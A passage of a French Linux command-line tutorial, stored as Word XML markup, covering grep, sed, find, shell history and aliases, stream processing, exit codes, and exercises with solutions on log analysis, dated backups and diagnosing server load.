        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux outils, six usages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grep : les options qui changent tout</w:t>
        <w:br/>
        <w:t>grep -rn "TODO" src/            # récursif avec numéros de ligne</w:t>
        <w:br/>
        <w:t>grep -i "erreur" journal.log    # insensible à la casse</w:t>
        <w:br/>
        <w:t>grep -v "^#" config.conf        # exclure les commentaires</w:t>
        <w:br/>
        <w:t>grep -c "GET" access.log        # compter les lignes</w:t>
        <w:br/>
        <w:t>grep -E "(500|502|503)" access.log   # expressions étendues</w:t>
        <w:br/>
        <w:br/>
        <w:t># sed : remplacer dans un flux</w:t>
        <w:br/>
        <w:t>sed 's/http:/https:/g' urls.txt</w:t>
        <w:br/>
        <w:t>sed -i.bak 's/localhost/127.0.0.1/g' config.ini   # avec sauvegarde</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>48.3 Rechercher</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> parcourt l'arborescence et applique des tests ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cherche dans le contenu. Les combiner résout la plupart des recherches réelles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre recherches composées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Fichiers modifiés depuis 7 jours, plus gros que 1 Mo</w:t>
        <w:br/>
        <w:t>find /var/log -type f -mtime -7 -size +1M -ls</w:t>
        <w:br/>
        <w:br/>
        <w:t># Supprimer les fichiers de plus de 30 jours, avec affichage préalable</w:t>
        <w:br/>
        <w:t>find /tmp -type f -mtime +30 -print</w:t>
        <w:br/>
        <w:t>find /tmp -type f -mtime +30 -delete</w:t>
        <w:br/>
        <w:br/>
        <w:t># Chercher un contenu dans les fichiers trouvés</w:t>
        <w:br/>
        <w:t>find . -name "*.py" -exec grep -l "import requests" {} +</w:t>
        <w:br/>
        <w:br/>
        <w:t># Éviter de descendre dans .git</w:t>
        <w:br/>
        <w:t>find . -path ./.git -prune -o -name "*.md" -print</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Outils et localisation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Alternatives modernes, plus rapides et plus lisibles</w:t>
        <w:br/>
        <w:t>rg "TODO" --glob '!node_modules'      # ripgrep</w:t>
        <w:br/>
        <w:t>fd -e py -x grep -l requests         # fd + exécution</w:t>
        <w:br/>
        <w:t>fzf                                   # sélection interactive</w:t>
        <w:br/>
        <w:br/>
        <w:t># Localiser une commande</w:t>
        <w:br/>
        <w:t>command -v nginx</w:t>
        <w:br/>
        <w:t>type -a python3</w:t>
        <w:br/>
        <w:t>which -a python3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>command -v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est plus fiable que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans un script : c'est une primitive du shell, et son code de retour indique directement si la commande existe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>48.4 Historique, alias et raccourcis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le shell conserve un historique exploitable. Bien utilisé, il évite de retaper des commandes longues et de rechercher dans une documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Neuf raccourcis qui font gagner des heures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history | grep ssh              # retrouver une commande</w:t>
        <w:br/>
        <w:t>Ctrl+R                          # recherche inversée</w:t>
        <w:br/>
        <w:t>!!                              # rejouer la dernière commande</w:t>
        <w:br/>
        <w:t>sudo !!                         # la rejouer avec sudo</w:t>
        <w:br/>
        <w:t>!$                              # dernier argument de la commande précédente</w:t>
        <w:br/>
        <w:t>Ctrl+A / Ctrl+E                 # début / fin de ligne</w:t>
        <w:br/>
        <w:t>Ctrl+U / Ctrl+K                 # effacer avant / après le curseur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre lignes de configuration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~/.bashrc</w:t>
        <w:br/>
        <w:t>alias ll='ls -lah --color=auto'</w:t>
        <w:br/>
        <w:t>alias gs='git status -sb'</w:t>
        <w:br/>
        <w:t>alias dc='docker compose'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Sortie plus sûre</w:t>
        <w:br/>
        <w:t>set -o noclobber</w:t>
        <w:br/>
        <w:br/>
        <w:t># Un PATH lisible</w:t>
        <w:br/>
        <w:t>export PATH="$HOME/.local/bin:$PATH"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.168 — Cinq raccourcis de contrôle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14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Raccourci</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="329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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2146"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ctrl+C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Interrompt la commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sortir d'un programme bloqué</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Ctrl+D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Fin d'entrée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Quitter un shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2146"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ctrl+Z</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Suspend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>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Reprendre avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>fg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Ctrl+L</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Efface l'écran</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Sans perdre l'historique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2146"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ctrl+W</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Efface le mot précédent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Corriger une faute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>48.5 Travailler avec des flux volumineux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un fichier de plusieurs gigaoctets ne tient pas en mémoire. Les outils de flux traitent ligne par ligne, ce qui permet de l'analyser sans le charger.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre techniques de flux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Suivre un journal en direct, en filtrant</w:t>
        <w:br/>
        <w:t>tail -f /var/log/nginx/access.log | grep --line-buffered " 500 "</w:t>
        <w:br/>
        <w:br/>
        <w:t># Traiter un gros fichier compressé sans le décompresser</w:t>
        <w:br/>
        <w:t>zcat archive.log.gz | awk '$9 == 500 {n++} END {print n}'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Échantillonner au lieu de tout lire</w:t>
        <w:br/>
        <w:t>head -n 100000 gros.csv | awk -F, '{somme += $3} END {print somme/NR}'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Paralléliser un traitement</w:t>
        <w:br/>
        <w:t>cat liste.txt | xargs -n 1 -P 4 traiter.sh</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CODE DE RETOUR</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Entier renvoyé par un processus : 0 pour un succès, une valeur non nulle pour un échec. Il permet d'enchaîner des commandes de façon conditionnelle.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre usages du code de retour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commande &amp;&amp; echo "succès"    # la seconde s'exécute si la première réussit</w:t>
        <w:br/>
        <w:t>commande || echo "échec"     # la seconde s'exécute si la première échoue</w:t>
        <w:br/>
        <w:t>commande; echo $?            # afficher le code de retour</w:t>
        <w:br/>
        <w:t>set -e                       # arrêter un script à la première erreur</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CONSTRUIRE UNE COMMANDE COMPLEXE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Écrire la première étape et regarder sa sortie.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Ajouter un tube, vérifier à nouveau.</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Sauvegarder la version qui fonctionne dans un script.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Commenter chaque étape en une phrase.</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Trois flux : entrée, sortie, erreur, numérotés 0, 1 et 2.</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&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> écrase, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ajoute ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>noclobber</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> protège.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tube connecte la sortie d'un programme à l'entrée du suivant.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filtres se composent : filtrer, extraire, trier, compter.</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find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> teste l'arborescence, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> le contenu.</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command -v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est la façon fiable de tester une commande.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code de retour 0 signifie succès.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flux se traitent ligne par ligne, sans charger en mémoire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les commandes s'enchaînent à la main. Le chapitre suivant les écrit dans des scripts pour les répéter sans erreur.</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48.1 — Compter les erreurs par URL</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 journal Nginx contient des lignes au format combiné.</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Filtrez les codes 5xx.</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Extrayez l'URL.</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Comptez et triez.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 48.2 — Sauvegarder sans écraser</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 script de sauvegarde quotidien doit conserver 7 jours.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Nommez avec la date.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Compressez.</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Purgez les archives anciennes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 48.3 — Trouver la cause d'une saturation</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Le serveur ralentit ; vous devez identifier le processus coupable.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Triez par processeur et par mémoire.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Vérifiez les entrées-sorties.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Observez l'évolution.</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48.1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awk '$9 ~ /^5/ {print $7}' /var/log/nginx/access.log \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  | sort | uniq -c | sort -rn | head -20</w:t>
        <w:br/>
        <w:br/>
        <w:t># Résultat attendu</w:t>
        <w:br/>
        <w:t>#  142 /api/commandes</w:t>
        <w:br/>
        <w:t>#   87 /api/paiement</w:t>
        <w:br/>
        <w:t>#   31 /recherche</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le champ 9 du format combiné est le code HTTP, le champ 7 l'URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>uniq -c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est obligatoire : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>uniq</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne compare que les lignes adjacentes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 48.2</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#!/usr/bin/env bash</w:t>
        <w:br/>
        <w:t>set -euo pipefail</w:t>
        <w:br/>
        <w:br/>
        <w:t>DEST=/var/backups/app</w:t>
        <w:br/>
        <w:t>mkdir -p "$DEST"</w:t>
        <w:br/>
        <w:br/>
        <w:t>tar -czf "$DEST/app-$(date +%F).tar.gz" -C /var/www app</w:t>
        <w:br/>
        <w:br/>
        <w:t>find "$DEST" -name "app-*.tar.gz" -mtime +7 -delete</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>set -euo pipefail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> arrête le script sur erreur, variable non définie ou échec dans un tube.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La date dans le nom rend chaque archive unique et triable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 48.3</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Processus les plus gourmands</w:t>
        <w:br/>
        <w:t>ps -eo pid,ppid,pcpu,pmem,etime,cmd --sort=-pcpu | head</w:t>
        <w:br/>
        <w:t>ps -eo pid,pcpu,pmem,cmd --sort=-pmem | head</w:t>
        <w:br/>
        <w:br/>
        <w:t># Entrées-sorties par processus</w:t>
        <w:br/>
        <w:t>iotop -oPa</w:t>
        <w:br/>
        <w:br/>
        <w:t># Suivi de la charge</w:t>
        <w:br/>
        <w:t>uptime</w:t>
        <w:br/>
        <w:t>vmstat 1 5</w:t>
        <w:br/>
        <w:t>pidstat 1 5</w:t>
      </w:r>
    </w:p>
    <w:p>
